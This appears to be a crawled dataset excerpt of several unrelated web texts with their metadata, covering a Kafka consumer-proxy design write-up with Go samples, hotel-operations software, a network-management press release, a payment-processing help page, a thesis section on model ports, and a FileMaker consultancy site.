The worker-based solution that DoorDash implemented to address this problem consists of a single Kafka consumer instance per partition, called a "worker," which pipes messages into a local queue. Processes called task-executors, within the "worker" instance, then retrieve the events from this queue and process them. This solution allows events on a single partition to be processed by multiple task-executors in parallel. If a single message is slow to process, it doesn't impact the processing time of other messages. Other available task-executors can read off the local queue and process messages even though a message at the head might be slow. While this solution solves HoLB caused by non-uniform consumer latency, it did not fit our design requirements due to its lack of data loss prevention. According to DoorDash, if a worker crashes, messages within its local queue may be lost. As previously established, data loss prevention was a strict design requirement for us, making this approach a poor fit for our use case.
Consumer Proxy Model (Uber)
Uber sought to solve HoLB caused by non-uniform consumer latency and poison pills while ensuring at-least-once delivery since they deemed data loss intolerable. Their solution, Consumer Proxy, solves HoLB by acting as a proxy between the Kafka cluster and multiple instances of the consumer application. With this approach, messages are ingested and then processed in parallel by consumer instances. Consumer Proxy also uses a system of internal acknowledgments sent by consumer instances, indicating the successful processing of a message. Consumer Proxy only commits messages back to Kafka which have been successfully processed. If a message cannot be processed, a dead-letter queue is used to store it for later retrieval. Uber's Consumer Proxy is a feature-rich solution that seems to fulfill all of our requirements. It eliminated HoLB due to the two causes our team was concerned with while avoiding data loss. That being said, Consumer Proxy is an in-house solution that is not publicly available for consumer application developers.
Based on our research, none of the solutions fit all of our requirements – they either were not supported in multiple languages, failed to solve HoLB for both causes identified, or were not publicly available. We chose Uber's consumer proxy model as the basis for Triage because it solved both causes of HoLB and was language agnostic. A Triage instance acts as a Kafka consumer proxy and passes messages to downstream consumer instances.
How Does Triage Work?
Triage will subscribe to a topic on the Kafka cluster and begin consuming messages. When a message is consumed, it is sent to an instance of a consumer application. This consumer instance will process the message and send back a status code that reflects whether or not a message has been successfully processed. Triage uses an internal system of acks and nacks (acknowledgments and negative acknowledgments) to identify healthy versus poison pill messages. Internally, Triage uses a Commit Tracker to determine which messages have been successfully acknowledged and can be committed back to Kafka. Once it has done so, those records are deleted from the tracker. For messages that have been negatively acknowledged, Triage utilizes the dead-letter pattern to avoid data loss.
Triage Solves HoLB Caused By Poison Pills
When a poison pill is encountered, the consumer instance will send back a nack for that message.
A nack directs Triage to deliver the message record in its entirety to a DynamoDB table. Here, it can be accessed at any point in the future for further analysis or work. The partition will not be blocked, and messages can continue to be consumed uninterrupted.
Triage Solves HoLB Caused by Non-Uniform Consumer Latency
With Triage, if a consumer instance takes an unusually long time to process a message, the partition remains unblocked. Messages can continue to be processed using other available consumer instances. Once the consumer instance finishes processing the slow message, it can continue processing messages.
How Can I Use Triage?
Triage can be deployed using our triage-cli command line tool, available as an NPM package. It offers a two-step process that deploys Triage to AWS. You can read our step-by-step instructions here: Triage CLI.
Connecting to Triage
Consumer applications can connect to Triage using our thin client library, currently offered in Go. It handles authenticating with and connecting to Triage and provides an easy-to-use interface for developers to indicate whether a message has been processed successfully.
Triage Design Challenges
Based on our requirements for Triage, we encountered a few challenges. Below, we'll present our reasoning behind the solutions we chose and how they allowed us to fulfill all of our solution requirements. We knew we wanted Triage to be language-agnostic – a consumer application should be able to connect to Triage, regardless of the language it's written in. To do this, we had to consider whether Triage would exist as a service between Kafka and the consumer or as a client library on the consumer itself. We also needed to decide on a suitable network protocol. By leveraging a service + thin client library implementation and gRPC code generation, we can build out support for consumer applications written in any language with relative ease.
Service vs. Client Library
On one hand, a client library offers simplicity of implementation and testing, as well as the advantage of not having to add any new pieces of infrastructure to a user's system. We could also expect to get buy-in from developers with less pushback, as testing a client library with an existing system is more manageable than integrating a new service. There were, however, some disadvantages with this approach. Our solution to addressing non-uniform consumer latency relies on parallel processing of a single partition. While, in theory, a client library could support multiple instances of a consumer application, a service implementation is more straightforward. Even if a client library were to be designed to dispatch messages to multiple consumer instances, it would begin to resemble a service implementation.
Another concern of ours was ease of maintainability. Within modern polyglot microservice environments, maintenance of client libraries written in multiple languages consumes a non-trivial amount of engineering hours. Changes in the Kafka version and the dependencies of the client libraries themselves could cause breaking changes that require time to resolve. We assumed that those hours could be better spent on core application logic. Kafka can be difficult to work with. While the core concepts of Kafka are relatively straightforward to understand, in practice, interaction with a Kafka cluster involves a steep learning curve. There are over 40 configuration settings that a Kafka client can specify, making setting up an optimal or even functional consumer application difficult.
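To give a sense of that surface area, here is a small sample of the tuning knobs exposed by just one Go client (segmentio/kafka-go). The values shown are arbitrary illustrations, and this is only a fraction of the configuration the official clients expose.

```go
package main

import (
	"time"

	"github.com/segmentio/kafka-go"
)

// newReader shows a handful of the many consumer settings a client can tune.
// Each value is illustrative only; in practice they interact with broker-side
// configuration and workload characteristics.
func newReader() *kafka.Reader {
	return kafka.NewReader(kafka.ReaderConfig{
		Brokers:           []string{"localhost:9092"},
		GroupID:           "example-group",
		Topic:             "orders",
		MinBytes:          1,                      // fetch as soon as any data is available
		MaxBytes:          10e6,                   // cap each fetch at roughly 10 MB
		MaxWait:           500 * time.Millisecond, // how long to wait for MinBytes
		CommitInterval:    time.Second,            // 0 means synchronous commits
		HeartbeatInterval: 3 * time.Second,
		SessionTimeout:    30 * time.Second,
		StartOffset:       kafka.FirstOffset, // where a brand-new group begins reading
	})
}

func main() {
	r := newReader()
	defer r.Close()
}
```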
Uber, for example, noted that their internal Kafka team was spending about half of their working hours troubleshooting for consumer application developers. By centralizing the core functionality of Triage to a service running in the cloud and only utilizing a thin client library for connecting to Triage, support and maintenance become easier. Triage's client library is simple – it makes an initial HTTP connection request with an authentication key provided by the developer and runs a gRPC server that listens for incoming messages. Implementing support in additional languages for this thin client library is straightforward, and much of the challenge around configuring a Kafka consumer is abstracted away from the developer.
The next decision that we faced was choosing an appropriate network protocol for communication with consumer applications. HTTP was an obvious consideration both for its ubiquity and ease of implementation; however, after further research, we felt gRPC was the better option. gRPC allows us to leverage the benefits of HTTP/2 over HTTP/1.1, specifically regarding the size of traffic we send and receive. gRPC uses protocol buffers, which are serialized and emitted as compact binaries, whereas APIs over HTTP/1.1 typically exchange the de-facto standard of JSON; the binary encoding yields much smaller payloads. Smaller payloads mean less data to send over the network and, ultimately, faster throughput. A counterpoint to the compression argument is the existence and growing popularity of JSON with gzip. Compression gains from protocol buffers compared to JSON with gzip are less impressive; however, we run into similar dependency pains mentioned in our discussion of service versus client library implementations. Each version of the thin client library we would potentially write must import its own language's implementation of gzip. gRPC also makes it easy to build out support for multiple languages via out-of-the-box code generation. Using the same gRPC files we've used for Triage's Go client library, we can utilize a simple command-line tool to generate gRPC server and client implementations in all major programming languages.
Enabling Parallel Consumption
Since Triage operates by dispatching messages to several consumer instances, we needed a way to send messages to, and receive responses from, them simultaneously. We knew that the language we chose would play a significant role in solving this challenge. By creating dedicated Goroutines for each consumer instance and synchronizing them with the rest of Triage via channels, we enable parallel consumption of a single Kafka partition. We chose Go for the relative simplicity of implementing concurrency via Goroutines and the ease of synchronization and passing data across these Goroutines via channels. Goroutines can be thought of as lightweight threads: functions that run concurrently with other functions. The resource overhead of creating and running a Goroutine is negligible, so it's not uncommon to see programs with thousands of Goroutines. This sort of multithreaded behavior is easy to use with Go, as a generic function can be turned into a Goroutine by simply prepending its invocation with the keyword go. Each major component of Triage exists as a Goroutine, which often relies on other underlying Goroutines. Channels are used extensively to pass data between these components and achieve synchronization where needed. In the sketch below (reconstructed here as code, since the original figures are not reproduced), the direct call to myFunc() blocks execution of the print statement "I'm after myFunc!".
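The following minimal sketch reconstructs the example being described; the exact code shown in the original figures may have differed slightly.

```go
package main

import (
	"fmt"
	"time"
)

func myFunc() {
	time.Sleep(100 * time.Millisecond) // stand-in for slow work
	fmt.Println("myFunc finished")
}

func main() {
	// Blocking call: the print statement below waits for myFunc to return.
	myFunc()
	fmt.Println("I'm after myFunc!")

	// As a Goroutine: the print statement runs immediately, while myFunc
	// executes in the background.
	go myFunc()
	fmt.Println("I'm after myFunc!")

	// Give the background Goroutine a moment to finish before main exits;
	// real code would synchronize with a channel or WaitGroup instead.
	time.Sleep(200 * time.Millisecond)
}
```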
Conversely, in the second half of the sketch, the invocation of myFunc() is prepended with the go keyword. It now executes in the background, as a Goroutine, allowing the print statement to run immediately.

Channels in Go are queue-like data structures that facilitate communication between Goroutines within a Go application. Channels support passing both primitives and structs. We can think of a function that writes a given value to a channel as a "sender" and a function that reads said value off of the channel as a "receiver." For an unbuffered channel, when a sender attempts to write a message but there is no receiver attempting to pull a message off of the channel, code execution is blocked until a receiver is ready. Similarly, if a receiver attempts to read a message off of the channel when there is no sender, code execution is blocked until a sender writes a message.

Ease of Deployment

We wanted to make sure that deploying Triage was as simple as possible for consumer application developers. Our goal was for setup, deployment, and teardown to be painless. By taking advantage of the AWS Cloud Development Kit (CDK) in conjunction with AWS Fargate on Elastic Container Service (ECS), we were able to create an automated deployment script that interacts with our command line tool, triage-cli. This allows users to deploy a failure-resistant Fargate service to AWS in just a few easy steps.

AWS Fargate on ECS

We chose AWS for its wide geographic distribution, general industry familiarity, and support for containerized deployments. AWS offers services in virtually every region of the world, meaning that developers looking to use Triage can deploy anywhere. We selected Fargate as the deployment strategy for Triage containers, removing the overhead of provisioning and managing individual virtual server instances. Instead, we could concern ourselves with relatively simple ECS task and service definitions. In our case, we define a task as a single container running Triage. Our service definition is a collection of these tasks, with the number of tasks being equal to the number of partitions for a given topic. This service definition is vital to how we guard against failure - if a Triage container were to crash, it would be scrapped and another would immediately be provisioned automatically. Using Fargate doesn't mean that we sacrifice any of the benefits that come with ECS, since Fargate is a launch type that runs on top of ECS. Health checks and logs, as well as all of the infrastructure created during the deployment, are available to and owned by a user, since Triage deploys using the AWS account logged into the AWS CLI.

Automated deployment is enabled by CDK. Manually deploying Triage would require an understanding of cloud-based networking that would increase technical overhead. Amazon's CDK abstracts that away – instead of having to set up the dozens of individual entities that must be provisioned and interconnected for a working cloud deployment, we were able to use ready-made constructs provided by the CDK for a straightforward deployment script. We created triage-cli to interact with the deployment script created with AWS CDK. This allows us to interpolate user-specific configuration details into the script and deploy using just two commands – triage init and triage deploy.

Having found solutions to our design challenges, we moved on to implementing Triage.
In this section, we will discuss the components that make up the application logic of a Triage container, as well as provide a brief overview of how our thin client library interacts with it. We will address implementation with the following subsections:
- Message Flow - How Triage pulls messages from Kafka and sends them to consumers
- Consumer Instances - How a consumer instance receives messages from Triage and responds
- Handling Acks/Nacks - How Triage handles these responses
- Commits - How Triage handles commits

We will start by describing the flow of messages from Kafka, through Triage, to downstream consumer instances. The Fetcher component is an instance of a Kafka consumer – it periodically polls Kafka for messages. It then writes these messages to the Commit Tracker component and sends them to the messages channel. We will discuss the Commit Tracker in a later section - for now, it is sufficient to know that a copy of a message ingested by Triage is stored in a hashmap, and a reference to this message is sent over the messages channel. At this point in the flow, messages from Kafka are sitting in the messages channel and are ready to be processed.

The Consumer Manager component runs a simple HTTP server that listens for incoming requests from consumer instances. After authenticating a request, the Consumer Manager parses the consumer instance's network address and writes it to the newConsumers channel. To recap, we now have messages from Kafka in a messages channel and network addresses to send them to in a newConsumers channel.

Triage's Dispatch component is responsible for getting messages from within Triage to the consumer instances. We can think of Dispatch as a looping function that waits for network addresses on the newConsumers channel. When it receives a network address, it uses it to instantiate a gRPC client – think of this as a simple agent to make network calls. When this client is created, a connection is established between the client and the consumer at the network address. Dispatch then calls a function called senderRoutine, passing it the gRPC client as a parameter. senderRoutine is invoked as a Goroutine, ensuring that when Dispatch loops and listens for the next network address, senderRoutine continues to run in the background. senderRoutine is essentially a for loop. First, a message is pulled off of the messages channel. The gRPC client passed to senderRoutine is then used to send this message over the network to the consumer instance. The senderRoutine now waits for a response.

We will now discuss how consumer instances receive messages from, and send responses to, Triage. Consumer applications interact with Triage using the Triage Client. This client library is responsible for the following:
- Providing a convenience method to send an HTTP request to Triage
- Accepting a message handler
- Running a gRPC Server

We have already covered the HTTP request – we will now examine message handlers and gRPC servers. Developers first pass the client library a message handler function – the message handler should take a Kafka message as a parameter, process the message, and return either a positive or negative integer based on the outcome of the processing. This integer is how consumer application developers can indicate whether a message has or has not been successfully processed. When the consumer application is started, it runs a gRPC server that listens on a dedicated port.
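A minimal sketch of what wiring up a handler might look like follows; the package path, type names, and function signatures here are illustrative assumptions, not the actual Triage client API:

package main

// Hypothetical import path and API, for illustration only.
import triage "github.com/example/triage-client"

// handle receives a Kafka message and returns a positive integer on success
// (ack) or a negative integer on failure (nack).
func handle(msg triage.KafkaMessage) int {
	if err := process(msg.Value); err != nil {
		return -1 // nack: Triage will route the record to DynamoDB
	}
	return 1 // ack
}

func process(payload []byte) error {
	// application-specific work goes here
	return nil
}

func main() {
	// Assumed constructor: connects over HTTP with the developer's auth key.
	client := triage.NewClient("triage.example.internal:80", "AUTH-KEY")
	// Assumed method: starts the embedded gRPC server and invokes handle
	// for every message Triage dispatches to this instance.
	client.Listen(handle)
}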
When the server receives a message from Triage, it invokes the message handler, with the message as an argument. If the message handler returns a positive integer, it indicates that the message was successfully processed, and an ack is sent back to Triage. If the handler returns a negative integer, it indicates that the message was not processed successfully, and a nack is sent to Triage.

So far, we have covered how messages get from Kafka, through Triage, and to consumer instances. We then explained how Triage's client library manages receiving these messages and sending responses. We will now cover how Triage handles these responses.

As discussed in the message flow section, after sending a message to a consumer instance, senderRoutine waits for a response. When a response is received, senderRoutine creates an acknowledgment struct. The struct has two fields - Status and Message. The Status field indicates either a positive or negative acknowledgment. If the response was a nack, a reference to the message is saved under the Message field of the struct. For acked messages, the Message field can be nil. Finally, before looping to send another message, senderRoutine places the struct on the acknowledgments channel.

A component called Filter listens on the acknowledgments channel. It pulls acknowledgment structs off the channel and performs one of two actions based on whether the struct represents an ack or a nack. For acks, Filter immediately updates the Commit Tracker's hashmap. We will discuss the Commit Tracker's hashmap in the next section - for now, it is enough to know that an ack means we can mark the entry representing the message in the hashmap as acknowledged. For nacks, however, the hashmap cannot be updated immediately - we have a bad message and need to ensure it is stored somewhere before moving on. Filter places this negative acknowledgment in the deadLetters channel. A component called Reaper listens on this deadLetters channel. It makes an API call to DynamoDB, attempting to write the faulty message to a table. Once confirmation is received from DynamoDB that the write was successful, the entry representing the message in Commit Tracker's hashmap can be marked as acknowledged.

At this point, we have covered how messages get from Kafka, through Triage, to consumer instances. We have also covered how consumer instances process these messages, send responses back to Triage, and how Triage handles these responses. We will now cover the Commit Tracker component and how it allows us to manage commits back to Kafka effectively.

As discussed in the message flow section, as messages are ingested by Triage, we store a reference to them in a hashmap. The hashmap's keys are the offsets of the messages, and the values are instances of a custom struct called CommitStore. The CommitStore struct has two fields - Message and Value. The Message field stores a reference to a specific Kafka message; the Value field stores whether or not Triage has received a response for this message. Previously, we mentioned that the Filter and Reaper components marked messages in the hashmap as acknowledged. More specifically, they were updating the Value field. Because messages that are nacked are stored in DynamoDB for processing at a later time, we can think of them as "processed," at least with respect to calculating which offset to commit back to Kafka. To calculate which offset to commit, a component called CommitCalculator periodically runs in the background.
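For reference, the two structs described above might look roughly like this in Go. Only the field names come from the write-up; the field types, the placeholder message type, and the helper at the end are assumptions (the commit rule the helper encodes is explained in the next section):

package triagesketch

// kafkaMessage is a stand-in for whatever Kafka message type Triage uses
// internally; the real type is not shown in the write-up.
type kafkaMessage struct {
	Offset int64
	Key    []byte
	Value  []byte
}

// Acknowledgment is what senderRoutine places on the acknowledgments channel.
type Acknowledgment struct {
	Status  bool          // true for an ack, false for a nack (type assumed)
	Message *kafkaMessage // populated only for nacks; nil for acks
}

// CommitStore is the value type of Commit Tracker's hashmap, keyed by offset.
type CommitStore struct {
	Message *kafkaMessage // reference to the ingested Kafka message
	Value   bool          // true once a response has been recorded (ack, or nack persisted to DynamoDB)
}

// highestCommittableOffset returns the greatest offset for which it and every
// earlier offset have been acknowledged - the rule explained next.
func highestCommittableOffset(tracker map[int64]CommitStore, lastCommitted int64) int64 {
	commit := lastCommitted
	for {
		entry, ok := tracker[commit+1]
		if !ok || !entry.Value {
			return commit
		}
		commit++
	}
}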
To be efficient with our commits, we want to commit the highest offset possible since Kafka will implicitly commit all messages below our committed offset. For example, if there are 100 messages in a partition and we commit offset 50, Kafka will consider offsets 0-49 as "committed." Extending this example, let us assume that these 100 messages are currently stored in the hashmap. If we have received acknowledgments for offsets 0 through 48 – and offset 50 – but have not yet received an acknowledgment for offset 49, we cannot commit offset 50 since that would imply that 49 has been successfully processed. Instead, we can only commit offset 48 and have to wait for the acknowledgment for 49 before committing 50. In other words, Commit Tracker commits the greatest offset for which all previous messages have also been acknowledged. Once this offset is determined, Triage sends a commit back to the Kafka cluster and awaits confirmation that the commit was successful. Finally, all entries up to and including the offset of the message just committed are removed from Commit Tracker's hashmap.

Having covered commits, we have arrived at the end of a message's life cycle within a system using Triage. Below are the improvements we would like to implement in the future.

Language Support for the Triage Client Library

The thin client library is currently offered only in Go; we would like to add support for additional languages.

Cause of Failure Field

Giving developers the ability to add a reason for failed messages would help them identify and analyze errors. Developers could supply a custom field on the nack sent to Triage. We would store this field with the message record in the DynamoDB table.

Notifications for Poison Pills

We believe developers could benefit from notifications when poison pills are written to DynamoDB. Integrating these notifications with a platform like Slack could serve as an alarm and enable a rapid response. We think this is a relatively easy feature to implement and is likely our next step.
systems_science
https://experience-crm.fr/en/partenaires/1check-app-hotel-operations/
2023-12-10T04:28:26
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679101195.85/warc/CC-MAIN-20231210025335-20231210055335-00649.warc.gz
0.895638
977
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__251058309
en
1Check was conceptualized in 2011 by Virginie LAFON as part of the Best Craftsmen in France competition, where she emerged as the winner in the Hotel Services Governess class. With the participation of Pierre LAFON, an expert in new mobile technologies, a prototype was developed and implemented in the Radisson Blu hotel as a beta version. The purpose of this solution is to digitally transform work procedures related to cleanliness, maintenance, and quality control, aiming to improve communication between three main services: reception, housekeeping, and maintenance. Quickly adopted by other accommodation-related sectors facing similar challenges, 1Check is also used in outdoor hospitality, tourist residences, theme parks, cruises, rentals, health, and facility management. 1Check is designed for teams working in interaction throughout the day. Communication and action tracking are immediate and seamless. As a mobile application, information exchange occurs in real-time among all collaborators, enhancing responsiveness and productivity by reducing movements within the establishment. Connected bidirectionally to PMS (Property Management System), the 1Check solution automatically retrieves real-time room statuses and facilitates direct mobile terminal status changes. This enables direct communication with reception teams, real-time room status visibility, and better informing clients about room availability. In this manner, 1Check also collects reservations, providing access to various predictive modules that facilitate operational management (linen management, schedule management, etc.). 1Check offers a SAAS (Software as a Service) solution, adapting to business-specific needs. It is an ergonomic, easy-to-deploy solution that equips all staff through a mobile application and an online-accessible software. Products & Services 1Check oversees the following aspects: Cleanliness and Quality Management: - Track the progress of room services. - Know the estimated time of room availability. - Have a real-time view of the rooms. - Send client requests to various concerned services. - Communicate instantly with staff through a messaging system. - Automate openings with dynamic credit/work time management. - Real-time monitoring and management of room services on different floors. - Manage team instructions and tasks as well as client requests. - Control rooms and public areas. - Report incidents of all types, including maintenance issues with comments and photos. - Record and manage found items on the go. - Real-time room updates to reception through PMS interface. - Receive and manage real-time maintenance requests from chambermaids, governesses, receptionists, or directly from clients using our MAX service. - Schedule corrective maintenance actions with external service provider management. - Plan and manage preventive maintenance actions on the go with checklists. - Oversee all maintenance through tracking indicators and be automatically alerted to abnormal recurrence of a problem in a room or public area. Reporting and Statistics: - Track KPIs and key indicators of one or multiple establishments directly from the 1Check software. - Quality control monitoring at all client contact points in the establishment. - Visibility into the detailed budget of annual investments. Additionally, for outdoor hospitality: - Manage departure schedules. - Manage automated cleaning schedules with area management. - Know the real-time availability of accommodation units after cleaning. 
- Send service requests to relevant teams. - Send technical incidents to the maintenance department. - Manage found items. - Receive and manage all real-time technical intervention requests. - Manage winterization entries and exits. - Conduct regulatory surveys such as water chemistry in pool areas on the go. - Have maintenance tracking for each chassis number. - Report incidents to the maintenance department from mobile homes. - Inspect mobile homes before customer arrival. - Communicate via messaging with all campsite staff. - The multilingual assistant accessible via a QR code in the room allows your clients to interact with operational teams from their room without going through the reception. - The QR code provides access to a customer web app where they will find your “room directory” (menus, activities, etc.) as well as the “client request” module through which they can make housekeeping or maintenance requests without contact. - Requests go directly to the concerned teams in real-time. Information is not lost, and the client is satisfied more quickly for optimal service quality. Additionally, your client can be informed of the progress of their request via SMS. Languages: French, English Region: France, French-speaking countries, UK, English-speaking countries Software suitable for: Hotels, Hotel-Restaurants, Hotel Groups, Hotel Residences, Campgrounds, Outdoor Hospitality, etc
systems_science
https://megasys.com/telenium-spectra-to-be-deployed-at-dairyland-power-cooperative/
2022-06-24T21:48:17
s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103033816.0/warc/CC-MAIN-20220624213908-20220625003908-00202.warc.gz
0.883843
284
CC-MAIN-2022-27
webtext-fineweb__CC-MAIN-2022-27__0__104690567
en
TELENIUM SPECTRA TO BE DEPLOYED AT DAIRYLAND POWER COOPERATIVE Calgary, AB – May 27, 2015 Dairyland Power Cooperative recently accepted MegaSys’ proposal of Telenium Spectra to monitor Dairyland’s microwave radio communications system and extended networks across its 45,000 square mile service area. The Telenium solution is expected to be in full production by July 1, 2015. With headquarters in La Crosse, Wis., Dairyland provides wholesale electricity to 25 member distribution cooperatives and 17 municipal utilities in Wisconsin, Minnesota, Iowa and Illinois. Please visit www.dairynet.com. MegaSys Computer Technologies is a major supplier of advanced Network Management Systems for the telecommunications market based on its flagship product Telenium. MegaSys has developed the most powerful and flexible network management system available, designed on an intelligent, high performance, object oriented database that provides unsurpassed processing, network management and database growth. Earning a reputation as a world-class performer in network management, MegaSys has delivered Telenium solutions across North America, Asia-Pacific and Europe. MegaSys customers include wireless and broadband carriers, CLECs, IXCs, cable companies, private utilities and state agencies, ranging in size from small regional networks to large national networks. Additional information is available at www.megasys.com.
systems_science
https://therabill.zendesk.com/hc/en-us/articles/217248203-Spinning-Circle-Processing-Credit-Card-Transactions
2019-10-14T03:44:37
s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986649035.4/warc/CC-MAIN-20191014025508-20191014052508-00020.warc.gz
0.916582
264
CC-MAIN-2019-43
webtext-fineweb__CC-MAIN-2019-43__0__119912295
en
Normally, processing a credit card takes a matter of seconds. In instances where the processor is taking a long time to respond, a spinning circle window will appear. To understand what is happening, let's review what happens when you process a credit card.

The Credit Card Process
- The system bundles the information that you provided and sends it to the credit card processor.
- The processor determines whether to approve or deny the transaction.
- A response is sent to the system and the results are displayed.

Continuous Spinning Circle
There are a few reasons why the circle can spin for an extended period of time:
- The credit card processor is taking longer than normal to respond. Be patient and give the processor up to 2 minutes to send a response.
- You lost internet connection. If you lost internet connection, then the application no longer has contact with your computer and can't remove the spinning circle.

If the spinning circle continues to show, you can close the gateway using the red X in the top-right corner. If the system eventually receives a response, an entry will appear on the Credit Card Transactions report. However, the lack of an entry does not mean the transaction was not processed. You will want to log into your virtual terminal to verify the status of the transaction.
systems_science
http://msdl.cs.mcgill.ca/people/tfeng/thesis/node31.html
2018-09-22T20:57:00
s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267158691.56/warc/CC-MAIN-20180922201637-20180922222037-00463.warc.gz
0.939862
600
CC-MAIN-2018-39
webtext-fineweb__CC-MAIN-2018-39__0__160996999
en
Ports and connections provide a means for a model to communicate with other concurrently and independently running models. This is different from importation, where a model is imported into an importation state of another model, and the combined model runs sequentially as a whole. Connections are the communication channels between those concurrent models. After they are established, messages can be sent and received via those channels. Except when two connected models communicate, they are independent, and they have no other means to affect the behavior of each other.

A message is a tuple consisting of a message name and a set of parameters. The names of different messages may be the same; in fact, there is no way to guarantee uniqueness, since every model runs independently and concurrently. There is no restriction on the message name, except that it must not contain a dot ".". Each parameter in the parameter set is a variable.

To establish a connection, a server model with at least one port must be started first. The link set of the server may be empty, since it usually does not connect to other models at start-up time. A client must also have at least one port. When it starts running, the simulation/execution environment connects it to the server(s) according to the link set defined in it. That is, for each link defined in the client's link set, the environment connects the named port of the client model with the named port of the server model(s). All the connections are established at start-up time. If any of the connections cannot be established, the client model cannot be simulated or executed. Its simulator or executor should immediately terminate, without even placing the client model in its default state(s). If any of several situations occurs, the establishment of the connection is considered a failure.

Once connections between two models are established, they are never disconnected. A port of a client may connect to multiple ports of one or more servers. Conversely, a port of a server may be connected by multiple ports of one or more clients.

Messages can be sent in any part of a model where action code can be written, such as the output of a transition, and the enter and exit actions of a state. To send a message, a model simply broadcasts an event whose name starts with the port name and a following dot ".". On the one hand, since neither the port name nor the message name can have a dot in it, the only dot in this representation separates the two parts. On the other hand, since no transition handles an internally sent event whose name contains a dot, the simulator or executor knows that it is an outgoing message instead of a normal event. Before the message is sent via a connection, the port name and the dot are removed. When the simulator or executor of the receiver receives this message, it first adds the name of its input port to the message name (again separated with a dot), and then broadcasts the event internally. The parameters of the message are regarded as the parameters of the event.
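As a small illustration of this naming convention (not part of the formalism itself; just a sketch in Go with assumed helper names):

package portsdemo

import (
	"fmt"
	"strings"
)

// outgoingEventName builds the event name a model broadcasts internally when
// it wants to send message msg through port port.
func outgoingEventName(port, msg string) string {
	return port + "." + msg // the single dot separates the port name from the message name
}

// splitEvent recovers the two parts; ok is false for normal (dot-free) events.
func splitEvent(event string) (port, msg string, ok bool) {
	i := strings.Index(event, ".")
	if i < 0 {
		return "", "", false
	}
	return event[:i], event[i+1:], true
}

func Example() {
	e := outgoingEventName("out", "request") // "out.request"
	if port, msg, ok := splitEvent(e); ok {
		// The sender's simulator strips "out." before transmitting; the
		// receiver's simulator prefixes its own input-port name again.
		fmt.Println(port, msg)
	}
}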
systems_science
https://www.coredbs.com/
2024-04-20T16:15:31
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817670.11/warc/CC-MAIN-20240420153103-20240420183103-00709.warc.gz
0.950455
2,346
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__85521041
en
We design and build Filemaker database systems — both large and small — to meet specific client needs. Our solutions are compatible with standard and popular desktop, tablet and mobile devices. We work with you on design. Then we build attractive and efficient websites which interact with your Filemaker databases. We use Filemaker Server's REST API to build data bridges and synchronization tools to help keep your data clean and consistent across systems. We develop your data systems using cloud computing for system stability and device-independent interface. This construction makes your systems readily accessible to all your staff members. We migrate data from outdated and constrained databases. We spend time upfront working with you to understand your unique data situation, and we solicit your feedback throughout. We build online payment processing tools leveraging Authorize.net and PayPal services. Filemaker Pro, MySQL EC2 Hosting, SES Mail, S3 Storage, CloudFront, Glacier HTML, CSS, PHP, JQuery, Bootstrap, Ajax, JSON Filemaker Go, Filemaker WebDirect, Bootstrap "CORESYSTEMS KNOWS SCHOOLS AND THEIR NEEDS. They understand us, from Admissions through grades and comments. I can't imagine working with anyone else." Doug Fodeman, Director of Technology, Brookwood School "CORESystems has revolutionized the way our school operates. Teachers, administrators and staff have all benefited from the care and personal attention that has gone into our customized system." Tom Gromak, Database Administrator, Watkinson School We built a database and website which integrates with the school's FinalSite website. Parents of returning students enroll their child(ren) for the upcoming academic year. Features include multiple contracts, individualized financial assistance amounts, payment processing. "When I was told we needed to have an online re-enrollment process I did not hesitate to ask CORESystems to develop it. We asked for online student contracts that leveraged FinalSite authentication and submitted to our Filemaker Pro database system. The system had to dynamically reflect contract status and collect e-check payments. In addition, it had to account for various family relations and multiple versions of contracts. As a long-time client, it was no surprise that the product Core delivered was able to provide accurate contracts, seamless delivery, and an attractive and intuitive user experience for our parents." — Katherine Schulze, Director of Technology We built an automated tool which migrates data from a Work Force Admissions module to a Tableau reporting tool. "I have been a CORESystems client since 2001. They are, without a doubt, one of the service providers that I value most highly. Their solutions are elegant, intuitive, easy to maintain, and their time to market is faster than any other vendor I have worked with. CORESystems deliverables perform as expected and meet specifications every time. On more than one occasion, when my other service providers are flummoxed, CORESystems has saved the day with innovative approaches to problems that have left others unsure how to proceed. When faced with a challenging data integration task that no one on the team has attempted before, CORESystems is my go-to as well. They are 100% reliable and I know that if I need assistance urgently, they will do everything possible to answer critical questions or resolve problems promptly. CORESystems is not merely a service provider to me, they are a value-added partner." 
— Dirk DeLo, Chief Technology Officer We built a custom, Filemaker web and reporting module to allow parents to register for conferences online. "The scheduling of parent-teacher conferences has long been a problem for us. Balancing the unique nature of our different academic devisions, the parent's schedules, fairness and efficiently has been a challenge no "off the shelf" systems to has been able to meet. Core Systems developed for us a completely customized and flexible parent-teacher conference scheduling system that allows parents to self register from a computer or smart phone in a completely fair and simple way. It provides them with automated reminders and us with useful reports. We could not have asked for anything more. " — Adam Gerson, Director of Technology We built a comprehensive all-school system which united data in Admissions, Current Students, Development and Summer Offices, and which includes an Online Application and a Parents Portal. "For the last seven years, Branson’s advancement team has utilized CORESystems to build what is now a multi-layered database that tracks gifts, pledges and donor information seamlessly. The CORE development team created several reporting features, which include our ‘favorite’, a two-year annual giving report that was incredibly time-consuming and challenging! They are always incredibly responsive, especially during crunch times should any items need modification. Last year, databases for our admission and academic departments, as well as our summer school program were streamlined; our campus systems are now one. We are beyond grateful for their time and talent that has helped our school function so efficiently and our advancement team look good!" — Susan Brennan, Director of the Annual Fund We built a School Directory module which incorporates Blackbaud data. "We have been having challenges every year with our printed school directory. The CORE Systems crew created an automated system using our database information to generate our directory. Going into this project, we were resigned that an automatic system would not be able to give use everything we wanted. Wrong. They were able to accommodate all the little details in our directory that we have grown accustomed to throughout the years. Literally with the push of a button, a directory is generated that is emailed to our printer. Thank you CORESystems for providing us with a mechanism to use our time more efficiently while producing a quality publication." — Jim Bonfiglio, Director of Operations We designed a report cards database built with Filemaker to store Blackbaud data which is refreshed periodically through an ODBC connection. The database also stores students, courses, and teachers attributes. We built a website with a series of user-specific pages for database access by teacher, administrators and parents. Teachers can efficiently enter their reports. Proofreaders have the ability to search for, edit and annotate individual reports. Proofreader notes are automatically emailed to teachers for quick and streamlined communication. The system emails parents with custom links when report cards are published. Parents may view a current report card or reports across the years. "This system has made our report card dreams come true. It was completely customized for our specific needs and workflow. Its integration with 